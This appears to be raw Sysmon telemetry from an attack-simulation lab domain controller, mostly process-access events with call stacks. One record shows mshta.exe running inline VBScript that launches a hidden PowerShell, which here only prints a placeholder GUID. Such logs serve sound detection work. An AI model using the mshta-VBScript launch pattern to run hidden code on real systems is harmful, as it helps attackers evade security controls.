15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.897{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.897{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.850{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.850{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000027553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.803{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xweytjmk.gko.ps12021-01-20 15:59:43.803 10341000x800000000000000027552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.803{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.756{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.756{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.756{7901BC46-536F-6008-7906-00000000A301}28645896C:\Windows\system32\conhost.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.741{7901BC46-536F-6008-7706-00000000A301}51566332C:\Windows\System32\mshta.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000027541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.750{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "vbscript:Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit"",0,true"))'" 10341000x800000000000000027540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.709{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.709{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.709{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.694{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.694{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.694{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.694{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 